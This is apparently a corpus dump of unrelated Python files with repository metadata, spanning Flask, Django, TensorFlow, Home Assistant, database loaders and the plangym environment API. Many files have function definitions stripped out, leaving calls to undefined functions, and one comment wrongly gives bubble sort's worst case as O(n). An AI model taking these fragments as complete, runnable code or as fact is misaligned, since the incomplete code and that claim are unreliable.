5f5c0b0acb48624cb76c04ec88d096e81b40a0f1 | 176 | py | Python | test_script.py | SamPurle/DE17_Flask | a6462b85854f7bd72c80ebcc555d50488ef17e67 | [
"MIT"
] | null | null | null | test_script.py | SamPurle/DE17_Flask | a6462b85854f7bd72c80ebcc555d50488ef17e67 | [
"MIT"
] | null | null | null | test_script.py | SamPurle/DE17_Flask | a6462b85854f7bd72c80ebcc555d50488ef17e67 | [
"MIT"
] | null | null | null | import numpy as np
import os
my_array = np.zeros(10)
print(my_array)
os.system('pip freeze > requirements.txt')
my_list = [1,2,3,4,5]
for item in my_list:
print(item)
| 12.571429 | 42 | 0.693182 |
5f5ebabcae4886b932638d5f3ecd10d1eb595d7b | 6,058 | py | Python | lib/blastin.py | zbwrnz/blastdbm | ee694c01ebb00779623702738a9c958fd496a080 | [
"Unlicense"
] | 1 | 2018-03-22T10:34:20.000Z | 2018-03-22T10:34:20.000Z | lib/blastin.py | arendsee/blastdbm | ee694c01ebb00779623702738a9c958fd496a080 | [
"Unlicense"
] | null | null | null | lib/blastin.py | arendsee/blastdbm | ee694c01ebb00779623702738a9c958fd496a080 | [
"Unlicense"
] | null | null | null | #! /usr/bin/python3
import argparse
import os
import re
import sqlite3 as sql
import sys
import xml.etree.cElementTree as et
import traceback
import lib.initialize as initialize
import lib.sqlite_interface as misc
import lib.meta as meta
# ==================
# EXPORTED FUNCTIONS
# ==================
| 31.552083 | 83 | 0.530538 |
5f63c4934790515bb6fc74d4d7ecc9a70d977a36 | 646 | py | Python | tests/test_get_image.py | kortizceballos/codeastro-group6 | 9f0ceb8a0fca3e619dbabe97105a3f283e59fa04 | [
"BSD-3-Clause"
] | 1 | 2021-06-25T21:20:42.000Z | 2021-06-25T21:20:42.000Z | tests/test_get_image.py | kortizceballos/codeastro-group6 | 9f0ceb8a0fca3e619dbabe97105a3f283e59fa04 | [
"BSD-3-Clause"
] | null | null | null | tests/test_get_image.py | kortizceballos/codeastro-group6 | 9f0ceb8a0fca3e619dbabe97105a3f283e59fa04 | [
"BSD-3-Clause"
] | null | null | null | from matplotlib.pyplot import get
import pyhips
from pyhips import get_image
def test_get_image():
"""
Tests the get_image() function to make sure no errors are thrown.
"""
assert get_image("Vega", frame="ICRS", survey="DSS", cmap="plasma") == 0
assert get_image("notanid", frame="ICRS", survey="DSS", cmap="plasma") == 1
assert get_image("Vega", frame="notaframe", survey="DSS", cmap="plasma") == 1
assert get_image("Vega", frame="ICRS", survey="notasurvey", cmap="plasma") == 1
assert get_image("Vega", frame="ICRS", survey="DSS", cmap="notacolormap") == 1
if __name__ == "__main__":
test_get_image() | 35.888889 | 83 | 0.662539 |
5f65055d81665e397feccfc78dd6d2f299634b64 | 138 | py | Python | cumulus2/template.py | peterkh/cumulus2 | 11352ce469acb0c319ba9cfb8691d80f4ae5048e | [
"Apache-2.0"
] | 1 | 2016-02-12T11:54:07.000Z | 2016-02-12T11:54:07.000Z | cumulus2/template.py | peterkh/cumulus2 | 11352ce469acb0c319ba9cfb8691d80f4ae5048e | [
"Apache-2.0"
] | null | null | null | cumulus2/template.py | peterkh/cumulus2 | 11352ce469acb0c319ba9cfb8691d80f4ae5048e | [
"Apache-2.0"
] | null | null | null | """
Template module for cumulus.
template class for reading yaml tempalte and creating data_source objects to
retrieve external data.
"""
| 23 | 76 | 0.797101 |
5f67096a7114362044846dbb3a2978d1562f88ac | 700 | py | Python | Python-AI-Algorithms/Bubble_sort.py | screadore/Artificial-Intelligence-Sorting-Algorithms | d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c | [
"MIT"
] | null | null | null | Python-AI-Algorithms/Bubble_sort.py | screadore/Artificial-Intelligence-Sorting-Algorithms | d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c | [
"MIT"
] | null | null | null | Python-AI-Algorithms/Bubble_sort.py | screadore/Artificial-Intelligence-Sorting-Algorithms | d69f34dbd02556c6a7bbb8e0dee45ab7fdb4b12c | [
"MIT"
] | null | null | null | # Bubble sort steps through the list and compares adjacent pairs of elements. The elements are swapped if they are in the wrong order. The pass through the unsorted portion of the list is repeated until the list is sorted. Because Bubble sort repeatedly passes through the unsorted part of the list, it has a worst case complexity of O(n).
| 36.842105 | 342 | 0.591429 |
5f670af72f12c73cbff679c29371d4269f74b778 | 551 | py | Python | Practice/Python/Strings/the_minion_game.py | nifannn/HackerRank | b05318251226704b1fb949c29aa49493d6ced44b | [
"MIT"
] | 7 | 2019-02-22T10:34:26.000Z | 2021-07-13T01:51:48.000Z | Practice/Python/Strings/the_minion_game.py | nifannn/HackerRank | b05318251226704b1fb949c29aa49493d6ced44b | [
"MIT"
] | null | null | null | Practice/Python/Strings/the_minion_game.py | nifannn/HackerRank | b05318251226704b1fb949c29aa49493d6ced44b | [
"MIT"
] | 7 | 2018-11-09T13:52:34.000Z | 2021-03-18T20:36:22.000Z |
if __name__ == '__main__':
minion_game(input("Enter a string: "))
| 30.611111 | 65 | 0.604356 |
5f6e27388481683369aca2bd805d2c503d7286e8 | 189 | py | Python | deep_learning_zero/ch5/sample.py | kaito0223/shakyou | 8d901b4da24fbf0c708e3eb429a57d194e9857c1 | [
"MIT"
] | null | null | null | deep_learning_zero/ch5/sample.py | kaito0223/shakyou | 8d901b4da24fbf0c708e3eb429a57d194e9857c1 | [
"MIT"
] | null | null | null | deep_learning_zero/ch5/sample.py | kaito0223/shakyou | 8d901b4da24fbf0c708e3eb429a57d194e9857c1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import numpy as np
X = np.random.rand(2) #input
W = np.random.rand(2,3) #weight
B = np.random.rand(3) #bias
print(X)
print(W)
print(B)
Y=np.dot(X,W)+B
print(Y)
| 11.8125 | 31 | 0.613757 |
5f71554b9254c1a62eba83f18f61c6f664cfe709 | 2,485 | py | Python | bdd/contact_stepts.py | LukinVV/python_training | 9e6eb57fe9527fd591d563b4219c19e49188c4de | [
"Apache-2.0"
] | null | null | null | bdd/contact_stepts.py | LukinVV/python_training | 9e6eb57fe9527fd591d563b4219c19e49188c4de | [
"Apache-2.0"
] | null | null | null | bdd/contact_stepts.py | LukinVV/python_training | 9e6eb57fe9527fd591d563b4219c19e49188c4de | [
"Apache-2.0"
] | null | null | null | from pytest_bdd import given, when, then
from model.contact import Contact
import random | 42.118644 | 101 | 0.781087 |
5f72286dd657c066d24e11dfe7993aa6f68aabbc | 769 | py | Python | FigureMaker.py | space-physics/histfeas | caa0100087d8c2b8711c1c3cb60c322379ef5431 | [
"MIT"
] | null | null | null | FigureMaker.py | space-physics/histfeas | caa0100087d8c2b8711c1c3cb60c322379ef5431 | [
"MIT"
] | null | null | null | FigureMaker.py | space-physics/histfeas | caa0100087d8c2b8711c1c3cb60c322379ef5431 | [
"MIT"
] | 1 | 2015-05-22T23:51:58.000Z | 2015-05-22T23:51:58.000Z | #!/usr/bin/env python
"""
Figures generated by HiST program
intended for use with in/ files including:
*_flame.ini
*_impulse.ini
*_trans.ini
Flaming Aurora 2 cameras:
./FigureMaker.py in/2cam_flame.ini
Translating Aurora 2 cameras:
./FigureMaker.py in/2cam_trans.ini
Impulse Aurora (for testing):
./FigureMaker.py in/2cam_impulse.ini
Table of results for 2 and 3 cam:
./FigureMaker.py in/table_flame{2,3}.ini
REAL actual camera data (just dump synchroinzed frames:
./FigureMaker.py -m realvid in/apr14T085454
-m optim reconstruct only
"""
from histfeas import userinput, hist_figure
from histfeas.loadAnalyze import readresults, findxlsh5
P = userinput()
#%% compute
if not P["load"]:
hist_figure(P)
#%% load
flist, P = findxlsh5(P)
readresults(flist, P)
| 20.783784 | 55 | 0.758127 |
5f72433b75556b159f57faa7593653f49eb2cb21 | 3,557 | py | Python | T53/webapp/accounts/models.py | DevelopAppWithMe/Hackathon_5.0 | 6af503a995721c04986931d6a29d8f946ceaa067 | [
"MIT"
] | null | null | null | T53/webapp/accounts/models.py | DevelopAppWithMe/Hackathon_5.0 | 6af503a995721c04986931d6a29d8f946ceaa067 | [
"MIT"
] | null | null | null | T53/webapp/accounts/models.py | DevelopAppWithMe/Hackathon_5.0 | 6af503a995721c04986931d6a29d8f946ceaa067 | [
"MIT"
] | null | null | null | from django.db import models
# Create your models here.
from django.contrib.auth.models import (
AbstractBaseUser,
BaseUserManager,
PermissionsMixin,
)
from django.core.validators import RegexValidator
from django.db import models
| 32.336364 | 104 | 0.687939 |
5f72dad431a7abe4ecae9aa703b14fc2183ff13a | 2,998 | py | Python | pyv6m/ha/v6m.py | dubnom/pyv6m | d56bf3f3d39b7c2f747b08bc1974dc3dbe6ccff8 | [
"MIT"
] | 1 | 2020-02-16T00:42:17.000Z | 2020-02-16T00:42:17.000Z | pyv6m/ha/v6m.py | dubnom/pyv6m | d56bf3f3d39b7c2f747b08bc1974dc3dbe6ccff8 | [
"MIT"
] | null | null | null | pyv6m/ha/v6m.py | dubnom/pyv6m | d56bf3f3d39b7c2f747b08bc1974dc3dbe6ccff8 | [
"MIT"
] | null | null | null | """Component to control v6m relays and sensors.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/v6m/
"""
import logging
import voluptuous as vol
from homeassistant.const import (
EVENT_HOMEASSISTANT_STOP, CONF_HOST, CONF_PORT, CONF_NAME)
import homeassistant.helpers.config_validation as cv
REQUIREMENTS = ['pyv6m==0.0.1']
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'v6m'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_PORT): cv.port,
vol.Optional(CONF_NAME, default=DOMAIN): cv.string,
}),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, base_config):
"""Start V6M controller."""
from pyv6m.pyv6m import V6M
config = base_config.get(DOMAIN)
host = config[CONF_HOST]
port = config[CONF_PORT]
controller = V6MController(host, port)
hass.data[config[CONF_NAME]] = controller
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, cleanup)
return True
| 28.552381 | 75 | 0.615744 |
5f7622df0a14efca2dcdfe048326621ae11f4cbc | 550 | py | Python | blog/models.py | Happy-Project-Foundation/HappyProject | 86e9fa7633e68c026e0003f8494df0226fa0dfcf | [
"Apache-2.0"
] | 3 | 2021-12-04T15:00:54.000Z | 2021-12-08T16:07:35.000Z | blog/models.py | BirnadinErick/HappyProject | 4993a2d966d9c1458ce0e29e72c3a758a7a4ef54 | [
"Apache-2.0"
] | 3 | 2021-12-15T00:49:01.000Z | 2021-12-16T00:46:14.000Z | blog/models.py | Happy-Project-Foundation/HappyProject | 86e9fa7633e68c026e0003f8494df0226fa0dfcf | [
"Apache-2.0"
] | 3 | 2021-12-04T14:18:15.000Z | 2021-12-05T08:40:13.000Z | import uuid
from django.db import models
from django.db.models.fields import TextField
| 32.352941 | 109 | 0.736364 |
5f79434b07d0fd0852489b19f8f438fa54ae857d | 7,273 | py | Python | finetune_test.py | tengfeixue-victor/One-Shot-Animal-Video-Segmentation | 15f9011c1b10f1e0c068f90ed46e72b3bc343310 | [
"MIT"
] | 2 | 2021-09-26T07:03:54.000Z | 2022-02-21T15:46:30.000Z | finetune_test.py | tengfeixue-victor/One-Shot-Animal-Video-Segmentation | 15f9011c1b10f1e0c068f90ed46e72b3bc343310 | [
"MIT"
] | null | null | null | finetune_test.py | tengfeixue-victor/One-Shot-Animal-Video-Segmentation | 15f9011c1b10f1e0c068f90ed46e72b3bc343310 | [
"MIT"
] | 1 | 2021-04-16T06:11:41.000Z | 2021-04-16T06:11:41.000Z | """
References: https://github.com/scaelles/OSVOS-TensorFlow
"""
from __future__ import print_function
import os
import random
import tensorflow as tf
import time
import numpy as np
from utils import models
from utils.load_data_finetune import Dataset
from utils.logger import create_logger
# seed
seed = random.randint(1, 100000)
# seed = 0
tf.random.set_seed(seed)
random.seed(seed)
np.random.seed(seed)
# User defined path parameters
# finetuning (one label) and testing dataset
sequence_images_path = './datasets/finetune_test_dataset/JPEGImages/480p'
sequence_names = os.listdir(sequence_images_path)
# Get the best frame selection from BubblNet
bub_frame_path = './datasets/bubbleNet_data/rawData'
def create_non_exist_file(non_exist_file):
"""Create the file when it does not exist"""
if not os.path.exists(non_exist_file):
os.mkdir(non_exist_file)
def select_optimal_frame(seq_name):
"""Use the optimal frame from BubbleNet selection for fine-tuning"""
# # Select from BN0 or BNLF
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/all.txt')
# # Select from BN0
# frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BN0.txt')
# Select from BNLF
frame_txt = os.path.join(bub_frame_path, seq_name, 'frame_selection/BNLF.txt')
frame_file = open(frame_txt, 'r')
frame_nums = frame_file.readlines()
# The following code is used to extract the name of frame selection
# refer to the txt file in './datasets/bubbleNet_data/rawData/frame_selection' for your information
if len(frame_nums) == 3:
frame_random_jpg = frame_nums[2][:9]
frame_random_png = frame_nums[2][:5] + '.png'
# when two bubblenet models select the different frames, the txt file will have 5 lines
elif len(frame_nums) == 5:
frame_suggestion1_jpg = frame_nums[2][:9]
frame_suggestion1_png = frame_nums[2][:5] + '.png'
frame_suggestion2_jpg = frame_nums[4][:9]
frame_suggestion2_png = frame_nums[4][:5] + '.png'
frame_random_lst = random.choice(
[[frame_suggestion1_jpg, frame_suggestion1_png], [frame_suggestion2_jpg, frame_suggestion2_png]])
frame_random_jpg = frame_random_lst[0][:9]
frame_random_png = frame_random_lst[1][:9]
else:
raise ValueError("frame file from BubbleNet is not correct")
return frame_random_jpg, frame_random_png
if __name__ == '__main__':
train_test(sequence_names)
| 41.56 | 126 | 0.639214 |
5f79476b04b3854cb2181098acbee05c751aa836 | 307 | py | Python | kinopoisk_unofficial/response/films/seasons_response.py | masterWeber/kinopoisk-api-unofficial-client | 5c95e1ec6e43bd302399b63a1525ee7e61724155 | [
"MIT"
] | 2 | 2021-11-13T12:23:41.000Z | 2021-12-24T14:09:49.000Z | kinopoisk_unofficial/response/films/seasons_response.py | masterWeber/kinopoisk-api-unofficial-client | 5c95e1ec6e43bd302399b63a1525ee7e61724155 | [
"MIT"
] | 1 | 2022-03-29T19:13:24.000Z | 2022-03-30T18:57:23.000Z | kinopoisk_unofficial/response/films/seasons_response.py | masterWeber/kinopoisk-api-unofficial-client | 5c95e1ec6e43bd302399b63a1525ee7e61724155 | [
"MIT"
] | 1 | 2021-11-13T12:30:01.000Z | 2021-11-13T12:30:01.000Z | from dataclasses import field, dataclass
from typing import List
from kinopoisk_unofficial.contract.response import Response
from kinopoisk_unofficial.model.season import Season
| 25.583333 | 59 | 0.814332 |
5f7a417145bc1e9d7aeea4542c8fef811419cb42 | 4,906 | py | Python | codepod/impl.py | alexmorley/codepod | d932391beda9c4df7f048326afe7d0ea73ccb141 | [
"Apache-2.0"
] | null | null | null | codepod/impl.py | alexmorley/codepod | d932391beda9c4df7f048326afe7d0ea73ccb141 | [
"Apache-2.0"
] | null | null | null | codepod/impl.py | alexmorley/codepod | d932391beda9c4df7f048326afe7d0ea73ccb141 | [
"Apache-2.0"
] | null | null | null | import subprocess
import os
import shutil
import tempfile
import random
import string
import yaml
src_dir=os.path.dirname(os.path.realpath(__file__))
#def _write_text_file(fname,txt):
# with open(fname,'w') as f:
# f.write(txt)
| 35.294964 | 155 | 0.664492 |
5f7b66cd930462b5d1756ba227c23eb8265b8002 | 5,040 | py | Python | closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py | ctuning/inference_results_v1.1 | d9176eca28fcf6d7a05ccb97994362a76a1eb5ab | [
"Apache-2.0"
] | 388 | 2018-09-13T20:48:58.000Z | 2020-11-23T11:52:13.000Z | closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py | ctuning/inference_results_v1.1 | d9176eca28fcf6d7a05ccb97994362a76a1eb5ab | [
"Apache-2.0"
] | 597 | 2018-10-08T12:45:29.000Z | 2020-11-24T17:53:12.000Z | closed/FuriosaAI/code/inference/vision/medical_imaging/3d-unet-kits19/inference_utils.py | ctuning/inference_results_v1.1 | d9176eca28fcf6d7a05ccb97994362a76a1eb5ab | [
"Apache-2.0"
] | 228 | 2018-11-06T02:04:14.000Z | 2020-12-09T07:51:02.000Z | #! /usr/bin/env python3
# coding=utf-8
# Copyright (c) 2021 NVIDIA CORPORATION. All rights reserved.
# Copyright 2021 The MLPerf Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import time
from scipy import signal
from global_vars import *
__doc__ = """
Collection of utilities 3D UNet MLPerf-Inference reference model uses.
gaussian_kernel(n, std):
returns gaussian kernel; std is standard deviation and n is number of points
apply_norm_map(image, norm_map):
applies normal map norm_map to image and return the outcome
apply_argmax(image):
returns indices of the maximum values along the channel axis
finalize(image, norm_map):
finalizes results obtained from sliding window inference
prepare_arrays(image, roi_shape):
returns empty arrays required for sliding window inference upon roi_shape
get_slice_for_sliding_window(image, roi_shape, overlap):
returns indices for image stride, to fulfill sliding window inference
timeit(function):
custom-tailored decorator for runtime measurement of each inference
"""
def gaussian_kernel(n, std):
"""
Returns gaussian kernel; std is standard deviation and n is number of points
"""
gaussian1D = signal.gaussian(n, std)
gaussian2D = np.outer(gaussian1D, gaussian1D)
gaussian3D = np.outer(gaussian2D, gaussian1D)
gaussian3D = gaussian3D.reshape(n, n, n)
gaussian3D = np.cbrt(gaussian3D)
gaussian3D /= gaussian3D.max()
return gaussian3D
def apply_norm_map(image, norm_map):
"""
Applies normal map norm_map to image and return the outcome
"""
image /= norm_map
return image
def apply_argmax(image):
"""
Returns indices of the maximum values along the channel axis
Input shape is (bs=1, channel=3, (ROI_SHAPE)), float -- sub-volume inference result
Output shape is (bs=1, channel=1, (ROI_SHAPE)), integer -- segmentation result
"""
channel_axis = 1
image = np.argmax(image, axis=channel_axis).astype(np.uint8)
image = np.expand_dims(image, axis=0)
return image
def finalize(image, norm_map):
"""
Finalizes results obtained from sliding window inference
"""
# NOTE: layout is assumed to be linear (NCDHW) always
# apply norm_map
image = apply_norm_map(image, norm_map)
# argmax
image = apply_argmax(image)
return image
def prepare_arrays(image, roi_shape=ROI_SHAPE):
"""
Returns empty arrays required for sliding window inference such as:
- result array where sub-volume inference results are gathered
- norm_map where normal map is constructed upon
- norm_patch, a gaussian kernel that is applied to each sub-volume inference result
"""
assert isinstance(roi_shape, list) and len(roi_shape) == 3 and any(roi_shape),\
f"Need proper ROI shape: {roi_shape}"
image_shape = list(image.shape[2:])
result = np.zeros(shape=(1, 3, *image_shape), dtype=image.dtype)
norm_map = np.zeros_like(result)
norm_patch = gaussian_kernel(
roi_shape[0], 0.125*roi_shape[0]).astype(norm_map.dtype)
return result, norm_map, norm_patch
def runtime_measure(function):
"""
A decorator for runtime measurement
Custom-tailored for measuring inference latency
Also prints str: mystr that summarizes work in SUT
"""
return get_latency
| 32.101911 | 91 | 0.698611 |
5f7d2edfb9acb222096440265492c363f375f8a6 | 3,047 | py | Python | fdtool/modules/GetFDs.py | dancps/FDTool | 0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a | [
"CC0-1.0"
] | 13 | 2019-03-22T13:30:04.000Z | 2022-02-01T04:46:44.000Z | fdtool/modules/GetFDs.py | dancps/FDTool | 0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a | [
"CC0-1.0"
] | 3 | 2020-07-01T11:17:40.000Z | 2022-02-13T11:20:34.000Z | fdtool/modules/GetFDs.py | dancps/FDTool | 0958f79fccbb3bb7d55cf9031ee4bd411e9c9b5a | [
"CC0-1.0"
] | 11 | 2018-07-02T23:46:31.000Z | 2021-12-14T12:29:38.000Z | import binaryRepr
# Create decorator function to see how many times functions are called
# Calculate Partition (C_k, r(U)) - the partitions
# of each candidate at level k are calculated
# Takes in data frame of relation and a candidate in C_km1
# Outputs partition of Candidate in C_km1 in relation to data frame
# Obtain FDs(C_km1) - checks the FDs of each
# candidate X in C_k
# - FDs of the form X -> v_i, where
# v_i *Exists* U - X^{+} are checked by
# comparing *Partition* X and *Partition* X v_i
#
# F = Null_Set
# for each candidate X in C_km1
# for each v_i *exists* U - X^{+} \\Pruning rule 3
# if (Cardinality(*Partition* X) == Cardinality(*Partition X v_i)) then
# {
# X* = X *Union* {v_i}
# F = F *Union* {X -> v_i} \\Theorem 2
# }
# return (F);
def f(C_km1, df, Closure, U, Cardinality):
# Set F to null list; Initialize U_c to remaining columns in data frame
F = []; U_c = list(df.head(0));
# Identify the subsets whose cardinality of partition should be tested
SubsetsToCheck = [list(Subset) for Subset in set([frozenset(Candidate + [v_i]) for Candidate in C_km1 for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)]))])];
# Add singleton set to SubsetsToCheck if on first k-level
if len(C_km1[0]) == 1: SubsetsToCheck += C_km1;
# Iterate through subsets mapped to the Cardinality of Partition function
for Cand, Card in zip(SubsetsToCheck, map(CardOfPartition, SubsetsToCheck, [df]*len(SubsetsToCheck))):
# Add Cardinality of Partition to dictionary
Cardinality[binaryRepr.toBin(Cand, U)] = Card;
# Iterate through candidates of C_km1
for Candidate in C_km1:
# Iterate though attribute subsets that are not in U - X{+}; difference b/t U and inclusive closure of candidate
for v_i in list(set(U_c).difference(Closure[binaryRepr.toBin(Candidate, U)])):
# Check if the cardinality of the partition of {Candidate} is equal to that of {Candidate, v_i}
if Cardinality[binaryRepr.toBin(Candidate, U)] == Cardinality[binaryRepr.toBin(Candidate + [v_i], U)]:
# Add attribute v_i to closure
Closure[binaryRepr.toBin(Candidate, U)].add(v_i)
# Add list (Candidate, v_i) to F
F.append([tuple(Candidate), v_i]);
return Closure, F, Cardinality;
| 43.528571 | 187 | 0.637348 |
5f7e6f4612c23637da085f15ec80d97da8c65063 | 1,712 | py | Python | experiments/benchmarks/activity_benchmark.py | Oidlichtnwoada/LongTermDependenciesLearning | f2913e86183588107f16402b402524a57b6ea057 | [
"MIT"
] | 1 | 2021-01-16T15:42:01.000Z | 2021-01-16T15:42:01.000Z | experiments/benchmarks/activity_benchmark.py | Oidlichtnwoada/LongTermDependenciesLearning | f2913e86183588107f16402b402524a57b6ea057 | [
"MIT"
] | null | null | null | experiments/benchmarks/activity_benchmark.py | Oidlichtnwoada/LongTermDependenciesLearning | f2913e86183588107f16402b402524a57b6ea057 | [
"MIT"
] | null | null | null | import os
import numpy as np
import pandas as pd
import experiments.benchmarks.benchmark as benchmark
ActivityBenchmark()
| 45.052632 | 139 | 0.624416 |
5f8081343c9866235ed311ae6467c672bfbe7609 | 4,685 | py | Python | apps/menuplans/views.py | jajadinimueter/recipe | f3f0a4054a14637bf4e49728876fe7b0a029a21f | [
"MIT"
] | null | null | null | apps/menuplans/views.py | jajadinimueter/recipe | f3f0a4054a14637bf4e49728876fe7b0a029a21f | [
"MIT"
] | null | null | null | apps/menuplans/views.py | jajadinimueter/recipe | f3f0a4054a14637bf4e49728876fe7b0a029a21f | [
"MIT"
] | null | null | null | import xml.etree.ElementTree as et
from dateutil import parser
from django.shortcuts import render
from django.shortcuts import redirect
from django.core.urlresolvers import reverse
import untangle
from .forms import MenuplanSearchForm
from .forms import MenuplanCreateForm
from .tables import MenuplanTable
from .dbaccess import add_menuplan
from .dbaccess import get_menuplans
from .dbaccess import create_menuplan
from .dbaccess import get_menuplan_display
| 30.225806 | 81 | 0.547492 |
5f809ea0bdda1d52d937bea676c3f2375a0406e8 | 6,448 | py | Python | data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
] | 5 | 2021-12-01T09:55:23.000Z | 2021-12-21T16:23:33.000Z | data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
] | 1 | 2022-03-14T16:50:41.000Z | 2022-03-14T16:50:41.000Z | data-detective-airflow/data_detective_airflow/operators/sinks/pg_scd1_df_update_insert.py | dmitriy-e/metadata-governance | 018a879951dee3f3c2c05ac8e05b8360dd7f4ab3 | [
"Apache-2.0"
] | 2 | 2021-11-03T09:43:09.000Z | 2021-11-17T10:16:29.000Z | from contextlib import closing
from io import StringIO
import numpy
import pandas
from airflow.providers.postgres.hooks.postgres import PostgresHook
from psycopg2.extensions import connection as psycopg2_connection
from data_detective_airflow.dag_generator.works import WorkType
from data_detective_airflow.operators.sinks.pg_loader import PgLoader, MAX_INSERT_ROWS_NUMBER
| 39.317073 | 109 | 0.640199 |
5f83b8fcb8f9923c7beb83eb883b788a12549bf3 | 32,588 | py | Python | plangym/core.py | FragileTech/plangym | 9a1482bea099f12f82bae27f1c5d13393daa8032 | [
"MIT"
] | 3 | 2020-03-25T22:19:17.000Z | 2020-11-02T16:11:32.000Z | plangym/core.py | FragileTech/plangym | 9a1482bea099f12f82bae27f1c5d13393daa8032 | [
"MIT"
] | 44 | 2020-03-25T14:17:54.000Z | 2022-03-12T00:18:48.000Z | plangym/core.py | FragileTech/plangym | 9a1482bea099f12f82bae27f1c5d13393daa8032 | [
"MIT"
] | 2 | 2020-03-25T12:17:12.000Z | 2020-06-19T23:07:52.000Z | """Plangym API implementation."""
from abc import ABC
from typing import Any, Callable, Dict, Generator, Iterable, Optional, Tuple, Union
import gym
from gym.envs.registration import registry as gym_registry
from gym.spaces import Space
import numpy
import numpy as np
wrap_callable = Union[Callable[[], gym.Wrapper], Tuple[Callable[..., gym.Wrapper], Dict[str, Any]]]
def step(
self,
action: Union[numpy.ndarray, int, float],
state: numpy.ndarray = None,
dt: int = 1,
) -> tuple:
"""
Step the environment applying the supplied action.
Optionally set the state to the supplied state before stepping it.
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
state: Set the environment to the given state before stepping it.
dt: Consecutive number of times that the action will be applied.
Returns:
if state is None returns ``(observs, reward, terminal, info)``
else returns ``(new_state, observs, reward, terminal, info)``
"""
if state is not None:
self.set_state(state)
obs, reward, terminal, info = self.step_with_dt(action=action, dt=dt)
if state is not None:
new_state = self.get_state()
data = new_state, obs, reward, terminal, info
else:
data = obs, reward, terminal, info
if terminal and self.autoreset:
self.reset(return_state=False)
return data
def step_batch(
self,
actions: Union[numpy.ndarray, Iterable[Union[numpy.ndarray, int]]],
states: Union[numpy.ndarray, Iterable] = None,
dt: Union[int, numpy.ndarray] = 1,
) -> Tuple[numpy.ndarray, ...]:
"""
Vectorized version of the `step` method. It allows to step a vector of \
states and actions.
The signature and behaviour is the same as `step`, but taking a list of \
states, actions and dts as input.
Args:
actions: Iterable containing the different actions to be applied.
states: Iterable containing the different states to be set.
dt: int or array containing the frameskips that will be applied.
Returns:
if states is None returns ``(observs, rewards, ends, infos)``
else returns ``(new_states, observs, rewards, ends, infos)``
"""
dt = (
dt
if isinstance(dt, (numpy.ndarray, Iterable))
else numpy.ones(len(actions), dtype=int) * dt
)
no_states = states is None or states[0] is None
states = [None] * len(actions) if no_states else states
data = [self.step(action, state, dt=dt) for action, state, dt in zip(actions, states, dt)]
return tuple(list(x) for x in zip(*data))
def init_env(self) -> None:
"""
Run environment initialization.
Including in this function all the code which makes the environment impossible
to serialize will allow to dispatch the environment to different workers and
initialize it once it's copied to the target process.
"""
pass
def close(self) -> None:
"""Tear down the current environment."""
pass
def sample_action(self):
"""
Return a valid action that can be used to step the Environment.
Implementing this method is optional, and it's only intended to make the
testing process of the Environment easier.
"""
pass
def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple:
"""
Take ``dt`` simulation steps and make the environment evolve in multiples \
of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps.
Args:
action: Chosen action applied to the environment.
dt: Consecutive number of times that the action will be applied.
Returns:
tuple containing ``(observs, reward, terminal, info)``.
"""
raise NotImplementedError()
def reset(
self,
return_state: bool = True,
) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]:
"""
Restart the environment.
Args:
return_state: If ``True`` it will return the state of the environment.
Returns:
``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``.
"""
raise NotImplementedError()
def get_state(self) -> Any:
"""
Recover the internal state of the simulation.
A state must completely describe the Environment at a given moment.
"""
raise NotImplementedError()
def set_state(self, state: Any) -> None:
"""
Set the internal state of the simulation.
Args:
state: Target state to be set in the environment.
Returns:
None
"""
raise NotImplementedError()
def get_image(self) -> Union[None, np.ndarray]:
"""
Return a numpy array containing the rendered view of the environment.
Square matrices are interpreted as a greyscale image. Three-dimensional arrays
are interpreted as RGB images with channels (Height, Width, RGB)
"""
return None
def clone(self) -> "BaseEnvironment":
"""Return a copy of the environment."""
raise NotImplementedError()
class PlanEnvironment(BaseEnvironment):
"""Base class for implementing OpenAI ``gym`` environments in ``plangym``."""
def __init__(
self,
name: str,
frameskip: int = 1,
episodic_live: bool = False,
autoreset: bool = True,
wrappers: Iterable[wrap_callable] = None,
delay_init: bool = False,
remove_time_limit=True,
):
"""
Initialize a :class:`PlanEnvironment`.
Args:
name: Name of the environment. Follows standard gym syntax conventions.
frameskip: Number of times an action will be applied for each ``dt``.
episodic_live: Return ``end = True`` when losing a live.
autoreset: Automatically reset the environment when the OpenAI environment
returns ``end = True``.
wrappers: Wrappers that will be applied to the underlying OpenAI env. \
Every element of the iterable can be either a :class:`gym.Wrapper` \
